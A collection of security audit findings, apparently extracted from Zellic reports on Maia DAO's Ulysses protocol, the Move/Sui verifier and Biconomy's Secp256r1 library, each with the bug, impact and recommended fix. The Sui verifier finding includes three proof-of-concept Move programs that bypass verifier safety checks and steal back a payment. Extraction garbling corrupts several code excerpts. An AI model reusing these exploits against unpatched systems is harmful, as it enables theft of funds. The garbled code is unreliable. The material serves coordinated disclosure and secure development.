(!isStrategyToken[_token]) revert UnrecognizedStrategyToken(); if (!isPortStrategy[_strategy][_token]) revert UnrecognizedPortStrategy(); uint256 reservesLacking = _reservesLacking(_token); IPortStrategy(_strategy).withdraw(address(this), _token, _amount < reservesLacking ? _amount : reservesLacking); getPortStrategyTokenDebt[msg.sender][_token] -= _amount; getStrategyTokenDebt[_token] -= _amount; emit DebtRepaid(_strategy, _token, _amount); } Approved strategy contracts are able to reduce debt by using funds withdrawn from other strategies. Additionally, there is an issue where, if the value of reservesLacking is less than the amount of funds that need to be withdrawn, the debt counters will be reduced inaccurately. This can result in an incorrect calculation of the minimum number of reserves. For example, 1. The current token balance is 100 tokens, the getMinimumTokenReserveRatio[_token] is 1000, the _minimumReserves is 10 tokens, and _excessReserves is 90 tokens. 2. The strategy borrows all available tokens, amounting to 90 tokens. 3. The getStrategyTokenDebt[_token] is 90 tokens. 4. The currBalance is equal to 10 tokens, and _minimumReserves is still 10 tokens. 5. The replenishReserves function is called with _amount = 10 tokens. 6. Because the _reservesLacking is 0, the strategy will withdraw nothing, but getStrategyTokenDebt[_token] will be reduced by _amount. 7. After changing the getStrategyTokenDebt[_token] without changing the balance, the _minimumReserves becomes equal to 9 tokens, but the currBalance is still equal to 10 tokens. So the _excessReserves will return 1 token, and strategies will be able to borrow again. uint256 internal constant DIVISIONER = 1e4; function _excessReserves(address _token) internal view returns (uint256) { uint256 currBalance = ERC20(_token).balanceOf(address(this)); uint256 minReserves = _minimumReserves(currBalance, _token); return currBalance > minReserves ? currBalance - minReserves : 0; } function _reservesLacking(address _token) internal view returns (uint256) { uint256 currBalance = ERC20(_token).balanceOf(address(this)); uint256 minReserves = _minimumReserves(currBalance, _token); return currBalance < minReserves ? minReserves - currBalance : 0; } function _minimumReserves(uint256 _currBalance, address _token) internal view returns (uint256) { return ((_currBalance + getStrategyTokenDebt[_token]) * getMinimumTokenReserveRatio[_token]) / DIVISIONER; } We recommend implementing the function as shown below. Add a new amount variable equal to the actual number of withdrawn tokens and reduce the getPortStrategyTokenDebt and getStrategyTokenDebt values by amount: function replenishReserves(address _strategy, address _token, uint256 _amount) external { ... uint256 amount = _amount < reservesLacking ? _amount : reservesLacking; IPortStrategy(_strategy).withdraw(address(this), _token, amount); getPortStrategyTokenDebt[_strategy][_token] -= amount; getStrategyTokenDebt[_token] -= amount; emit DebtRepaid(_strategy, _token, amount); } This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: c11c18a1, d04e441f.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.13 Bridging assets erroneously mints new assets", "labels": [ "Zellic" ], "body": "Target: ArbitrumBranchPort Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The functions bridgeIn and bridgeInMultiple are supposed to increase the local hToken supply by bridging assets into the Arbitrum Branch. No assets are supposed to be minted here, only transferred from the RootPort. This can be done by calling RootPort->bridgeToLocalBranch with a deposit equal to 0. Instead, these functions both call mintToLocalBranch, which bridges nothing and mints new hTokens every time. More tokens than expected will be minted, and the tokens will not leave the RootPort. This mistake can possibly be manually fixed by selectively burning. Depending on the exact use of the tokens, inflation of the number of tokens might be detrimental.
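To illustrate the shape of the fix recommended below, here is a hedged sketch (the IRootPort interface and function signatures are assumptions based on the names in this finding, not the actual Ulysses code):
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Assumed interface; the real RootPort signatures may differ.
    interface IRootPort {
        function bridgeToLocalBranch(address to, uint256 amount, uint256 deposit) external;
        function mintToLocalBranch(address to, uint256 amount) external;
    }

    contract ArbitrumBranchPortSketch {
        IRootPort public rootPort;

        constructor(IRootPort _rootPort) {
            rootPort = _rootPort;
        }

        // Sketch of bridgeIn: transfer existing supply from the RootPort with a
        // zero deposit instead of minting brand-new hTokens.
        function bridgeIn(address _recipient, uint256 _amount) external {
            // Buggy behavior: rootPort.mintToLocalBranch(_recipient, _amount);
            rootPort.bridgeToLocalBranch(_recipient, _amount, 0); // deposit == 0, no minting
        }
    }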
Replace calls to mintToLocalBranch with bridgeToLocalBranch instead and set the correct amount and deposits so that no new tokens are minted. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit 0fecbc05.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.14 Lack of input validation", "labels": [ "Zellic" ], "body": "Target: Multiple Contracts Category: Coding Mistakes Likelihood: Low Severity: Informational : Low The following functions lack input validation. 1. In the BranchBridgeAgent contract, the anyFallback function lacks a check that getDeposit contains the _depositNonce. 2. In the UlyssesFactory contract, the createToken function lacks a check that pools contains the input poolIds[i]. The createPools function lacks a check that assets does not contain zero addresses. 3. In the UlyssesPool contract, the swapIn and swapFromPool functions lack a check that the assets value is not zero. 4. In the UlyssesToken contract, the addAsset function lacks a check that the _weight is not zero. The setWeights function lacks a check that _weights does not contain zero amounts. 5. In the ERC4626MultiToken contract, the constructor lacks a check that _weights does not contain zero amounts. 6. In the ERC20hTokenBranchFactory contract, the initialize lacks a check that the _coreRouter is not the zero address. 7. In the ERC20hTokenRootFactory contract, the constructor lacks a check that the rootPortAddress is not the zero address. The initialize lacks a check that the _coreRouter is not the zero address. 8. In the RootBridgeAgentFactory contract, the constructor lacks a check that the wrappedNativeToken, rootPortAddress, and daoAddress are not zero addresses. 9. In the BranchBridgeAgentFactory contract, the createBridgeAgent lacks a validation of _rootBridgeAgentAddress. 10. In the ERC20hTokenRoot contract, the constructor lacks a check that the factoryAddress and rootPortAddress are not zero addresses. 11. In the BranchBridgeAgent contract, the constructor lacks a check that all passed addresses are not zero. The _clearDeposit lacks a check that the getDeposit[_depositNonce] exists. 12. In the ArbitrumBranchPort contract, the constructor lacks a check that the rootPortAddress address is not zero. 13. In the BranchPort contract, the initialize lacks a check that the coreBranchRouterAddress and _bridgeAgentFactory addresses are not zero. The setCoreRouter lacks a check that the _newCoreRouter address is not zero. 14. In the BaseBranchRouter contract, the initialize lacks a check that the localBridgeAgentAddress address is not zero. 15. In the CoreBranchRouter contract, the constructor lacks a check that the localPortAddress and hTokenFactoryAddress addresses are not zero. 16. In the BasePortGauge contract, the constructor lacks a check that the _bRouter address is not zero. 17. In the CoreRootRouter contract, the constructor lacks a check that the _wrappedNativeToken and _rootPortAddress addresses are not zero. The initialize lacks a check that the _bridgeAgentAddress and _hTokenFactory addresses are not zero. 18. In the MulticallRootRouter contract, the constructor lacks a check that the _localPortAddress and _multicallAddress addresses are not zero. The initialize lacks a check that the _bridgeAgentAddress address is not zero. 19.
In the RootBridgeAgent contract, the constructor lacks a check that all passed addresses are not zero. The _reopenSettlement lacks a check that the getSettlement[_settlementNonce] exists. The callOutAndBridge lacks a check that the IPort(localPortAddress).getLocalTokenFromGlobal() and the IPort(localPortAddress).getUnderlyingTokenFromLocal return nonzero addresses. The callOutAndBridgeMultiple lacks a check that the IPort(localPortAddress).getLocalTokenFromGlobal() and the IPort(localPortAddress).getUnderlyingTokenFromLocal return nonzero addresses. The _bridgeIn lacks a check that the IPort(localPortAddress).getGlobalTokenFromLocal() returns nonzero addresses. The _gasSwapIn and _gasSwapOut lack a check that the IPort(localPortAddress).getGasPoolInfo returns nonzero addresses. 20. In the RootPort contract, the constructor lacks a check that the _wrappedNativeToken address is not zero. The initialize lacks a check that the _bridgeAgentFactory and _coreRootRouter addresses are not zero. The initializeCore lacks a check that the _coreLocalBranchBridgeAgent and _localBranchPortAddress addresses are not zero. The forefeitOwnership lacks a check that the _owner address is not zero. The setLocalBranchPort lacks a check that the _branchPort address is not zero. The setUnderlyingAddress, setAddresses, setLocalAddress, addNewChain, initializeEcosystemTokenAddresses, and addEcosystemTokenToChain lack verification that adding token addresses does not lead to overwriting previously added ones. The mint, burn, bridgeToRoot, bridgeToRootFromLocalBranch, bridgeToLocalBranch, and burnFromLocalBranch lack a check that the hToken address was actually created by the ERC20hTokenRootFactory. If important input parameters are not checked, especially in functions that are available for any user to call, it can result in functionality issues and unnecessary gas usage and can even be the root cause of critical problems. It is crucial to properly validate input parameters to ensure the correct execution of a function and prevent any unintended consequences. Consider adding require statements and necessary checks to the above functions. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit 6ba3df02.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.15 Lack of new owner address check", "labels": [ "Zellic" ], "body": "Target: Multiple Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The smart contracts UlyssesPool, UlyssesToken, BranchPort, BranchBridgeAgentFactory, and ERC20hTokenBranch inherit from the solady/auth/Ownable.sol contract and use the _initializeOwner function to assign an owner to the contract. The owner\u2019s address is provided by the caller within the constructor. However, there are no checks in place to ensure that the address of the new owner is not the zero address. Furthermore, the _initializeOwner function does not validate this either. If the zero address is set as the owner during contract deployment, the contract will deploy successfully, but the contract owner will not be set. This can potentially lead to an inability to perform certain functions, such as modifying the contract state.
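A minimal sketch of such a guard (hedged; the ZeroOwner error name is illustrative and not taken from the audited codebase, and solady's _initializeOwner is assumed per the report):
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import {Ownable} from "solady/auth/Ownable.sol";

    contract OwnedExample is Ownable {
        error ZeroOwner(); // hypothetical error, not from the audited code

        constructor(address _owner) {
            // Reject the zero address before handing it to _initializeOwner,
            // which performs no validation of its own.
            if (_owner == address(0)) revert ZeroOwner();
            _initializeOwner(_owner);
        }
    }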
We recommend implementing proper validation checks inside the constructor function before the _initializeOwner function execution in the UlyssesPool, UlyssesToken, BranchPort, BranchBridgeAgentFactory, and ERC20hTokenBranch contracts. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit da4751e6. It was not fixed for the UlyssesToken contract.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.16 Addresses may accidentally be overwritten", "labels": [ "Zellic" ], "body": "Target: RootPort Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The addEcosystemTokenToChain function may only be called by the contract owner. It adds entries to the double mappings getGlobalAddressFromLocal and getLocalAddressFromGlobal, which map between local and global addresses on a specific chain. However, there are no checks done to ensure that the mapping is not already set. function addEcosystemTokenToChain(address ecoTokenGlobalAddress, address ecoTokenLocalAddress, uint256 toChainId) external onlyOwner { getGlobalAddressFromLocal[toChainId][ecoTokenLocalAddress] = ecoTokenGlobalAddress; getLocalAddressFromGlobal[toChainId][ecoTokenGlobalAddress] = ecoTokenLocalAddress; } This can modify the addresses set by setAddresses, which is a function that can only be called by a coreRootRouterAddress. It also ends up replicating the behavior in a different function with a different modifier: function setLocalAddress(address _globalAddress, address _localAddress, uint24 _fromChain) external requiresCoreBridgeAgent { getGlobalAddressFromLocal[_fromChain][_localAddress] = _globalAddress; getLocalAddressFromGlobal[_fromChain][_globalAddress] = _localAddress; } The addEcosystemTokenToChain function can change addresses set by the core root router and vice versa. It is likely unintended that the owner can accidentally overwrite addresses that result from cross-chain communication. If it is intentional that the owner should be able to override addresses set by the router, then consider renaming the add function to set. Otherwise, introduce a requirement that the address is not already set, possibly with a parameter that can override the behavior. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 728ee138, 8b17cb59.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.17 Ownable contracts allow renouncing", "labels": [ "Zellic" ], "body": "Target: Multiple Contracts; e.g., BranchBridgeAgentFactory, RootPort, BranchPort, UlyssesToken, UlyssesPool Category: Coding Mistakes Likelihood: Low Severity: Low : Informational The renounceOwnership() function is included by default in contracts that inherit the Ownable contract. In some cases, this functionality is used intentionally, such as to initialize a contract and then permanently disable the possibility of initializing it again by renouncing ownership. However, in other contracts, the owner functionality is used throughout the contract for important functionality. If an owner accidentally renounces ownership, this permanently stops anyone from calling these critical functions. Therefore, it is important to use caution when using renounceOwnership() and to ensure that it is used only when necessary and intentional.
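For contracts that must always keep an active owner, a hedged sketch of the revert-on-renounce override discussed below (the RenounceDisabled error name is illustrative, and solady's payable virtual signature for renounceOwnership is assumed):
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import {Ownable} from "solady/auth/Ownable.sol";

    contract NonRenounceable is Ownable {
        error RenounceDisabled(); // hypothetical error for illustration

        constructor(address _owner) {
            _initializeOwner(_owner);
        }

        // Solady declares renounceOwnership() as public payable virtual,
        // so it can be overridden to always revert.
        function renounceOwnership() public payable override onlyOwner {
            revert RenounceDisabled();
        }
    }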
Depending on which contract becomes unusable, the impact could vary. It could result in the loss of funds or the loss of configurability of contracts, potentially requiring redeployment. In contracts that require an active owner, override renounceOwnership() with a function that reverts. The Ownable contract contains a two-step ownership transfer procedure that can be used to change ownership in a secure way. This issue has been acknowledged by Maia DAO, and a fix was implemented in commit ce37be6d. Note that UlyssesPool and UlyssesToken were not added because users or protocols may want to make the Pool or Token completely decentralized by \u201cfreezing\u201d contract parameters.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" }, { "title": "3.1 Command results without the drop ability could be dropped", "labels": [ "Zellic" ], "body": "Target: Programmable Transactions Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Programmable transaction commands can return a result containing one or more objects. Those objects can be used as inputs to subsequent commands, for example as inputs to a Move call or transferred to an address. All objects without the drop ability must be used before the transaction ends. This is enforced by the ExecutionContext::finish function, which checks the type and abilities for each result from the commands executed. However, the implementation of the function for values of type Some(Value::Raw(RawValueType::Loaded)) is currently incomplete. Some(Value::Raw(RawValueType::Loaded { abilities, .. }, _)) => { // - nothing to check for drop // - if it does not have drop, but has copy, // the last usage must be by value in order to \"lie\" and say that the // last usage is actually a take instead of a clone // - Otherwise, an error if abilities.has_drop() { } else if abilities.has_copy() && !matches!(last_usage_kind, Some(UsageKind::ByValue)) { let msg = \"The value has copy, but not drop. Its last usage must be by-value so it can be taken.\"; return Err(ExecutionError::new_with_source( ExecutionErrorKind::UnusedValueWithoutDrop { result_idx: i as u16, secondary_idx: j as u16, }, msg, )); } The logic for handling results that have drop or copy is implemented, but values that have neither ability are passed through, instead of causing an error as per the specification. This violates the specified property of programmable transactions and could allow results without both drop and copy to be dropped. Notably, data types that represent coins and capabilities typically do not have those abilities, including the standard Sui framework data type for representing coins. Additionally, a common implementation of flash loans gives the borrower an object representing the loan position that does not have the drop ability. In order to correctly finish the transaction, this object must be destroyed by giving it back to the lender contract together with the lent funds and interest. This vulnerability would allow breaking the security of such a system by dropping the object regardless of its declared abilities. Implement a third condition in the if/else block shown above that would return an ExecutionErrorKind::UnusedValueWithoutDrop for types where !abilities.has_copy() is true. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit 8109e2e4.
", "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security Assessment - Zellic Audit Report.pdf" }, { "title": "3.2 Incorrect control flow graph construction", "labels": [ "Zellic" ], "body": "Target: Core Move Verifier Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Some verifiers make use of a program analysis technique called abstract interpretation. This technique analyzes the code of the program being verified by following its control flow graph (CFG). The CFG of a function is a directed graph that represents all the possible execution paths of a program. Nodes of the graph represent a basic block, which is a sequence of instructions in which only the last one is a branch, return, or abort. Edges between two nodes mean that there is a possible execution path between the source and the destination node. For efficiency reasons, the successors list of every basic block is precomputed when the CFG is created. The successors list of a basic block is the set of basic blocks that can be directly reached from it. The function that computes the successors of an instruction, file_format.rs::get_successors, contains an edge case that causes it to incorrectly return an empty list of successors: pub fn get_successors(pc: CodeOffset, code: &[Bytecode]) -> Vec<CodeOffset> { assert!( // The program counter must remain within the bounds of the code pc < u16::MAX && (pc as usize) < code.len(), \"Program counter out of bounds\" ); // Return early to prevent overflow if pc is hitting the end of max number of instructions allowed (u16::MAX). if pc > u16::max_value() - 2 { return vec![]; } // [function continues...] If the pc of the instruction is u16::MAX - 1, the list of successors is empty. The incorrect construction of the CFG can lead to a bypass of any verifier that uses the CFG successor list. These currently include the core Move reference safety and locals safety verifiers, as well as the Sui-specific ID leak verifier. Multiple avenues of attack are possible because of this security issue. We constructed proofs of concept that bypass both core verifiers. This vulnerability could likely be exploited to cause extremely significant financial damage. For instance, a common implementation of flash loans gives the borrower an object that does not have the drop ability, which must be given back to the lender contract together with the lent funds and interest in order to correctly finish the transaction. As shown in the below proofs of concept, the security of the system can be broken by bypassing the locals safety verifier. We note that the Move VM has additional optional security checks (paranoid_type_checks) that prevent most exploits. These checks result in a runtime VM error and are not part of the verifier. They seem to be effective at preventing an object without the drop ability from being dropped, but they are insufficient to guard against all possible exploits, as demonstrated in the third proof of concept. Reference safety verifier bypass This proof of concept demonstrates the ability to bypass the reference safety verifier by invoking a hypothetical squash function that takes two mutable Coin references and moves the value of the second coin into the first. The function is instead invoked with two mutable references to the same coin:
The function is instead invoked with two mutable references to the same coin: /)# publish -)syntax=move module 0x1:)balance { struct Balance has drop { value: u64 } public fun create_balance(value: u64): Balance { Balance { value } } public fun squash(balance_1: &mut Balance, balance_2: &mut Balance) { let balance_2_value = balance_2.value; balance_2.value = 0; balance_1.value = balance_1.value + balance_2_value; } Zellic Mysten Labs } /)# run import 0x1.balance; main() { let balance_a: balance.Balance; label padding: jump end; return; /) [PADDING RETURN STATEMENTS] return; label start: balance_a = balance.create_balance(100); balance.squash(&mut balance_a, &mut balance_a); return; label end: jump start; } Locals safety verifier This second proof of concept demonstrates the ability to bypass the locals safety ver- ifier by dropping a value that does not have the drop ability. Two instances of an object are obtained and stored in a local variable. The first instance is overwritten with the second (which would normally not be possible), and the second instance is then de- stroyed using an intended function. We note that dropping an object of which only one instance exists should also be possible in a similar fashion, for example by wrap- ping it into a vector and overwriting it with an empty vector of the same type. /)# publish -)syntax=move module 0x1:)test { struct HotPotato { value: u32 } public fun get_hot_potato(): HotPotato { HotPotato { value: 42 } } Zellic Mysten Labs public fun destroy_hot_potato(potato: HotPotato) { HotPotato { value: _ } = potato; } } /)# run import 0x1.test; main() { let hot_potato_1: test.HotPotato; let hot_potato_2: test.HotPotato; label padding: jump end; return; /) [LOTS OF RETURNS] return; label start: hot_potato_1 = test.get_hot_potato(); hot_potato_2 = test.get_hot_potato(); hot_potato_1 = move(hot_potato_2); test.destroy_hot_potato(move(hot_potato_1)); return; label end: jump start; } Paranoid type checks bypass This following proof of concept demonstrates how it is possible to push a mutable reference to an object and the object itself to the virtual machine stack. This allows to pass the object to some other function while retaining a mutable reference to it. This proof of concept simulates a payment by invoking a function that takes a Balance object and then steals back the transferred value by using the mutable reference. The most straightforward way to obtain a reference in Move would be to store the object in a local variable and then to take a reference to it. Using this method to push both a mutable reference and the instance of the target object on the stack is not feasible due to runtime checks independent from the verifier and from the separate paranoid_type_checks. Execution of the MoveLoc instruction to move the local variable Zellic Mysten Labs to the stack will cause an error in values_impl.rs:)swap_loc; the function checks that the reference count of the object being moved is at most one. Since taking a mutable reference increases the reference count, it not possible to move a local variable for which a reference exists. This proof of concept shows one of the possible bypasses to this limitation. The bro- ken state is achieved by packing the victim object in a vector, taking a reference to the object, and then pushing the object to the stack by unpacking the vector. This strat- egy allows to get a mutable reference to the object without it being stored directly in a local variable, bypassing the check. 
/)# publish -)syntax=move module 0x1:)test { struct Balance has drop { value: u64 } public fun balance_create(value: u64): Balance { Balance { value } } public fun balance_value(balance: &Balance): u64 { balance.value } public fun pay_debt(balance: Balance) { assert!(balance.value >) 100, 234); /) Here we are dropping the balance /) In reality it would be transferred, the payment marked as done, etc } public fun balance_split(self: &mut Balance, value: u64): Balance { assert!(self.value >) value, 123); self.value = self.value - value; Balance { value } } } /)# run import 0x1.test; Zellic Mysten Labs main() { let v: vector; let bal: test.Balance; label padding: jump end; return; /) [padding returns] return; label start: bal = test.balance_create(100); v = vec_pack_1(move(bal)); /) Stack at this point: /) Pushes a mutable reference to the balance on the stack vec_mut_borrow(&mut v, 0); /) Stack at this point: &mut balance /) Pushes the balance instance by unpacking the vector vec_unpack_1(move(v)); /) Stack at this point: &mut balance, balance /) Pay something (implicitly using the balance on top of the stack as argument) test.pay_debt(); /) Stack at this point: &mut balance /) We still have the mutable reference to the balance, let's steal from it (100); bal = test.balance_split(); /) Stack at this point: /) Push 100 on the stack assert(test.balance_value(&bal) =) 100, 567); return; label end: Zellic Mysten Labs jump start; } Remove the edge case from the function, turning it into an assertion as a hardening measure. Additionally, we suggest to use checked math operations as an additional safety precaution. This edge case was likely implemented to make sure that regular instructions and con- ditional branches (which can fall through to the next offset) do not cause an overflow in the program counter. However, by the point the CFG is computed in the verifier, the control flow verifier has already established that the last instruction in a function is an unconditional branch. Since functions can have at most 65,536 instructions, this means that the instruction at offset u16:)MAX must be an unconditional branch. There- fore its pc+1 (which would overflow) will never be a successor. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit d2bf6a3c. The issue affected multiple third party users of the Move codebase; therefore, d2b f6a3c fixes the issue covertly and was released as part of a coordinated disclosure effort. Zellic Mysten Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security Assessment - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Inefficient handling of VecPack and VecUnpack instructions", + "labels": [ + "Zellic" + ], + "body": "Target: Type Safety and Reference Safety Verifiers Category: Coding Mistakes Likelihood: Medium Severity: Medium : Informational The type safety and reference safety verifiers maintain a stack that is used to model the effects the code being verified would have on the real Move VM stack. We observed a potentially exploitable inefficiency in the code that processes VecPack and VecUnpack. These instructions allow to pack and unpack a fixed number of ele- ments from a vector. The VecPack removes the specified number of elements from the operand stack and inserts them in a new vector, while VecUnpack does the opposite. The two verifiers execute a number of operations that equals the number of elements that would be packed or unpacked by these instructions. 
This can be seen in this excerpt of code from type_safety.rs:)verify_instr Bytecode:)VecPack(idx, num) => { let element_type = &verifier.resolver.signature_at(*idx).0[0]; for _ in 0.)*num { let operand_type = safe_unwrap!(verifier.stack.pop()); if element_type !) &operand_type { return Err(verifier.error(StatusCode:)TYPE_MISMATCH, offset)); } } verifier .stack .push(ST:)Vector(Box:)new(element_type.clone()))); } /) ...)) Bytecode:)VecUnpack(idx, num) => { let operand_vec = safe_unwrap!(verifier.stack.pop()); let declared_element_type = &verifier.resolver.signature_at(*idx).0[0]; if operand_vec !) ST:)Vector(Box:)new(declared_element_type.clone())) { } return Err(verifier.error(StatusCode:)TYPE_MISMATCH, offset)); Zellic Mysten Labs for _ in 0.)*num { verifier.stack.push(declared_element_type.clone()); } } as well as this excerpt from reference_safety/mod.rs:)execute_inner: Bytecode:)VecUnpack(idx, num) => { safe_assert!(safe_unwrap!(verifier.stack.pop()).is_value()); let element_type = vec_element_type(verifier, *idx)?; for _ in 0.)*num { verifier.stack.push(state.value_for(&element_type)); } } /) ...)) Bytecode:)VecUnpack(idx, num) => { safe_assert!(safe_unwrap!(verifier.stack.pop()).is_value()); let element_type = vec_element_type(verifier, *idx)?; for _ in 0.)*num { verifier.stack.push(state.value_for(&element_type)); } } This inefficient implementation could allow to perform a DOS attack on the verifier by submitting a program with an instruction that performs a VecPack or VecUnpack instruction on a very large number of elements. The attack is made harder in practice by constraints imposed by previous verifiers that limit the number of elements that can effectively be used in these instructions. First, the maximum number of elements is limited to 2^16 by the instruction consis- tency verifier. Second, the stack usage verifier enforces a configurable limit on the maximum stack height increase in a single basic block, which is currently set to 1,024. This directly implies that a single VecUnpack instruction cannot operate on more than 1,024 elements. Due to the requirement that the stack height is balanced between a basic block entry and exit, it indirectly implies that VecPack also cannot operate on more than 1,024 elements, since the elements would have to be pushed on the stack by other operations that are also subject to the same limitation. Additionally, the de- Zellic Mysten Labs fault configuration for the Sui protocol limits a module to have a maximum of 1,000 function definitions, and each function to have at most 1,024 basic blocks. Despite these constraints, we do believe a slightly more sophisticated attack could be possible. It is possible to create a module with a large number of functions each containing numerous basic blocks that exploit this inefficiency to the maximum ex- tent. The module could also declare other similar malicious modules as dependencies, which would stress the verifier further, since dependencies are also verified when they are loaded. A stopgap remediation, also suggested by Mysten Labs engineers, would be to further limit the number of elements allowed in VecPack/VecUnpack instructions. However, determining if a maximum safe number exists and quantifying it is not trivial. Implementing a more efficient method for maintaining the verifier stack seems to be Instead of storing only a single type per element, the verifier stack could possible. 
store a tuple consisting of (type, num_elements) that could more efficiently represent repeated elements of the same type, both in terms of space and time. This issue has been acknowledged by Mysten Labs, and a fix was implemented in commit 19ba60e7.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Move and Sui Security Assessment - Zellic Audit Report.pdf"
  },
  {
    "title": "3.2 Valid signatures with large value for r are rejected",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Secp256r1
Category: Coding Mistakes
Likelihood: Low
Severity: High
Impact: Medium

The VerifyWithPrecompute function handles verification of ECDSA signatures. Signatures consist of a pair (r, s) of integers 0 < r, s < n, where n is the order of the elliptic curve secp256r1. The signature is ultimately accepted if and only if the x-coordinate x of a computed point on the elliptic curve satisfies x == r, as can be seen in the code snippet below.

(x, y) = ShamirMultJacobian(points, u1, u2);
return (x == r);

However, the elliptic curve secp256r1 is defined over the finite field Fp, so the x-coordinate x will be an element of Fp and be represented by an integer satisfying 0 \u2264 x < p. Specifications[2] state that a signature should be accepted if x % n == r. As n < p, it can happen that x % n == r but x != r, so some signatures that should be accepted are not. That a properly generated valid signature will hit this bug by accident is extremely unlikely (it will happen roughly once every 10^39 signatures). The Project Wycheproof test vectors show, however, that it is possible to generate such signatures on purpose. The impact on the security of projects making use of the Secp256r1 library for signature verification is highly dependent on how signatures are otherwise used. See section 4.1 for a discussion of this as well as the reason for our severity rating. This bug is the root cause of the failure of test case ID 285 (k*G has a large x-coordinate) from Project Wycheproof. Replace return (x == r); by return ((x % nn) == r);.

[2] See, for example, section 6.4.2 of https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf.

This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 983b699d.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf"
  },
  {
    "title": "3.3 Validity of public keys is not checked",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Secp256r1
Category: Coding Mistakes
Likelihood: Low
Severity: High
Impact: Medium

The Verify function does not check the validity of the public key passKey. To be valid, a public key needs to[3]

1. not be the point at infinity,
2. have coordinates (x, y) satisfying 0 \u2264 x, y < p, and
3. satisfy the equation y^2 = x^3 + ax + b modulo p.

The public key is only used after conversion to Jacobian coordinates in _preComputeJacobianPoints with JPoint(passKey.pubKeyX, passKey.pubKeyY, 1), which is never the point at infinity. The _affineFromJacobian function uses the convention that (0,0) in affine coordinates represents the point at infinity. So for this special case, conversion as JPoint(passKey.pubKeyX, passKey.pubKeyY, 1) would be incorrect. But given that the point at infinity is not a valid public key anyway, this is not an issue if instead the public key (0,0) is rejected by recognizing that (0,0) does not lie on the curve.
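For illustration, a minimal sketch of such a validity check (a hypothetical helper, not part of the library under review; P, A, and B are assumed to hold the secp256r1 field prime and curve coefficients):

function isValidPublicKey(uint256 x, uint256 y) internal pure returns (bool) {
    if (x >= P || y >= P) return false; // property 2: coordinates must be reduced mod p
    if (x == 0 && y == 0) return false; // property 1: rejects the (0,0) alias for infinity
    uint256 lhs = mulmod(y, y, P); // y^2 mod p
    uint256 rhs = addmod(addmod(mulmod(mulmod(x, x, P), x, P), mulmod(A, x, P), P), B, P); // x^3 + ax + b mod p
    return lhs == rhs; // property 3: the point lies on the curve
}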
As the x and y coordinates of passKey always get reduced modulo p in calculations, the missing check for property 2 means that Verify will in effect check the signature for the public key with coordinates (x % p, y % p). This means that for some public keys (x, y), where x < 2^256 \u2212 p or y < 2^256 \u2212 p, there exists another pair (x', y') \u2014 for example, (x+p, y) \u2014 that can be used as a public key and for which signatures made for (x, y) would also verify. Finally, if the public key passed to Verify does not lie on the curve, then results returned by Verify do not have a meaningful interpretation. Whether the possibility that an attacker could generate two different keys for which the same signature is valid is a problem depends on how the caller uses public keys and signature verification.

[3] See, for example, the recommendation in NIST SP 800-186, Appendix D.1.1.

This bug allows an attacker to generate public keys together with signatures that will be rejected by verification algorithms that validate the public key but will be accepted by Verify. The impact on the security of projects making use of the Secp256r1 library for signature verification is highly dependent on how signatures are otherwise used. See section 4.1 for a discussion of this as well as the reason for our severity rating. Ensure that (passKey.pubKeyX, passKey.pubKeyY) is a valid public key for the secp256r1 curve. One option is to check this in the Verify function. If this is instead ensured by callers of Verify, then one could alternatively document that Verify assumes validity of the public key and that the caller must ensure this. This issue has been acknowledged by Biconomy Labs, and fixes were implemented in the following commits: f7e03db2, 55d6e09c.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf"
  },
  {
    "title": "3.4 Invalid Jacobian coordinates used for the point at infinity",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Secp256r1
Category: Coding Mistakes
Likelihood: N/A
Severity: Informational
Impact: Informational

